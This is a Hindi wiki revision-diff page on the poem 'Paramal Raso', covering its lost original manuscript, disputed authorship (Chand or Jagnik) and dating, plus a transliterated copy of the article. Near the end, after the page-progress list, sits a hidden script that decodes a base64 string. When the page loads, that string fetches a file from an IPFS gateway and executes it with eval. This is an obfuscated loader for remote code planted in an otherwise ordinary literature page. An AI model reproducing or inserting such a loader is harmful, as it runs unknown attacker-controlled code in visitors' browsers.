Difference between revisions of "परमाल रासो"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*इस ग्रन्थ की मूल प्रति कहीं नहीं मिलती। *इसके रचयित...' के साथ नया पन्ना बनाया)
 
Line 6: Line 6:
 
*श्री रामचरण हयारण 'मित्र' ने अपनी कृति 'बुन्देलखण्ड की संस्कृति और साहित्य' में 'परमाल रासो' को [[चंदबरदाई|चन्द]] की स्वतन्त्र रचना माना है। किन्तु [[भाषा]], शैली एवं [[छन्द]] में - 'महोबा खण्ड' से यह काफी भिन्न है। उन्होंने टीकामगढ़ राज्य के वयोवृद्ध दरबारी कवि श्री 'अम्बिकेश' से इस रचना के कंठस्थ छन्द लेकर अपनी कृति में उदाहरण स्वरुप दिए हैं।  
 
*श्री रामचरण हयारण 'मित्र' ने अपनी कृति 'बुन्देलखण्ड की संस्कृति और साहित्य' में 'परमाल रासो' को [[चंदबरदाई|चन्द]] की स्वतन्त्र रचना माना है। किन्तु [[भाषा]], शैली एवं [[छन्द]] में - 'महोबा खण्ड' से यह काफी भिन्न है। उन्होंने टीकामगढ़ राज्य के वयोवृद्ध दरबारी कवि श्री 'अम्बिकेश' से इस रचना के कंठस्थ छन्द लेकर अपनी कृति में उदाहरण स्वरुप दिए हैं।  
 
*रचना के एक छन्द में समय की सूचना दी गई है जिसके अनुसार इसे 1115 वि. की रचना बताया गया है जो [[पृथ्वीराज चौहान|पृथ्वीराज]] एवं चन्द के समय की तिथियों से मेल नहीं खाती। इस आधार पर इसे चन्द की रचना कैसे माना जा सकता है। यह इसे 'परमाल चन्देल' के दरबारी कवि 'जगनिक' की रचना माने तो जगनिक का रासो कही भी उपलब्ध नहीं होता है।
 
*रचना के एक छन्द में समय की सूचना दी गई है जिसके अनुसार इसे 1115 वि. की रचना बताया गया है जो [[पृथ्वीराज चौहान|पृथ्वीराज]] एवं चन्द के समय की तिथियों से मेल नहीं खाती। इस आधार पर इसे चन्द की रचना कैसे माना जा सकता है। यह इसे 'परमाल चन्देल' के दरबारी कवि 'जगनिक' की रचना माने तो जगनिक का रासो कही भी उपलब्ध नहीं होता है।
*स्वर्गीय महेन्द्रपाल सिंह ने अपने एक लेख में लिखा है कि '''जगनिक का असली रासो अनुपलब्ध है।''' इसके कुछ हिस्से दतिया, समथर एवं चरखारी राज्यों में वर्तमान थे, जो अब नष्ट हो चुके हैं।
+
*स्वर्गीय महेन्द्रपाल सिंह ने अपने एक लेख में लिखा है कि '''जगनिक का असली रासो अनुपलब्ध है।''' इसके कुछ हिस्से दतिया, समथर एवं चरखारी राज्यों में वर्तमान थे, जो अब नष्ट हो चुके हैं।<ref>{{cite web |url=http://knowhindi.blogspot.com/2011/02/blog-post_4165.html |title=रासो काव्य : वीरगाथायें|accessmonthday=15 मई|accessyear=2011|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
 +
 
  
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 13:42, 30 May 2011

  • is granth ki mool prati kahian nahian milati.
  • isake rachayita ke bare mean bhi vivad hai.
  • par isake 'mahoba khand' ko san. 1976 vi. mean d aau. shyamasundar das ne 'paramal raso' ke nam se sanpadit kiya tha.
  • d aau. mata prasad gupt ke anusar yah rachana solahavian shati vikrami ki ho sakati hai.
  • is rachana ke sambandh mean kaphi matabhed hai.
  • shri ramacharan hayaran 'mitr' ne apani kriti 'bundelakhand ki sanskriti aur sahity' mean 'paramal raso' ko chand ki svatantr rachana mana hai. kintu bhasha, shaili evan chhand mean - 'mahoba khand' se yah kaphi bhinn hai. unhoanne tikamagadh rajy ke vayovriddh darabari kavi shri 'ambikesh' se is rachana ke kanthasth chhand lekar apani kriti mean udaharan svarup die haian.
  • rachana ke ek chhand mean samay ki soochana di gee hai jisake anusar ise 1115 vi. ki rachana bataya gaya hai jo prithviraj evan chand ke samay ki tithiyoan se mel nahian khati. is adhar par ise chand ki rachana kaise mana ja sakata hai. yah ise 'paramal chandel' ke darabari kavi 'jaganik' ki rachana mane to jaganik ka raso kahi bhi upalabdh nahian hota hai.
  • svargiy mahendrapal sianh ne apane ek lekh mean likha hai ki jaganik ka asali raso anupalabdh hai. isake kuchh hisse datiya, samathar evan charakhari rajyoan mean vartaman the, jo ab nasht ho chuke haian.[1]



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. raso kavy : viragathayean (hindi). . abhigaman tithi: 15 mee, 2011.

sambandhit lekh